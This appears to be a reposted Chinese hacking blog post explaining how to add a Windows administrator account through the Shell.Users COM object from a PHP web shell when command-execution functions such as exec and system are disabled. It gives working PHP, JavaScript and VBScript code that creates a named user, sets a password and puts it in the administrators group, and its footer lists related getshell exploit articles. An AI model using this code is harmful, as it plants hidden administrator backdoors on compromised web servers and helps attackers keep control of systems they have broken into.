当 php执行命令的函数如exec,system,shell_exec,proc_open,passthru,popen
以及wscript.shell 组建被禁用的情况下,这也许是一个机会。
代码如下:
复制代码代码如下:
<?php
echo "<div align=center><b>PHP 版Shell.Users加管理员帐号</b></div>";
$username="IceSkin";
$password="skin.com";
$su = new COM("Shell.Users");
$h=$su->create($username);
$h->changePassword($password,"");
$h->setting["AccountType"] = 3;//这句很重要可以把用户加入administrators 组,
?>
对apache 搭建的Web 服务器可以执行成功,IIS 好像权限不够,nginx 和lighttpd 搭建的web 服务器还没有测试。
下面是 LCX 的代码
js:
var o=new ActiveXObject( "Shell.Users" );
z=o.create("test") ;
z.changePassword("123456","")
z.setting("AccountType")=3;
vbs:
Set o=CreateObject( "Shell.Users" )
Set z=o.create("test")
z.changePassword "123456",""
z.setting("AccountType")=3
hi.baidu.com/南拳daddy
【php版shell.users加管理员帐号的方法】相关文章:
★ DedeCms V5.6漏洞 变量未初始化 导致鸡助漏洞
★ phpcms2008 代码执行 批量getshell EXP(使用菜刀)
★ DEDECMS网站管理系统模板执行漏洞(影响版本v5.6)
★ mysql的user.MYD数据库连接密码hash值无法用winhex打开等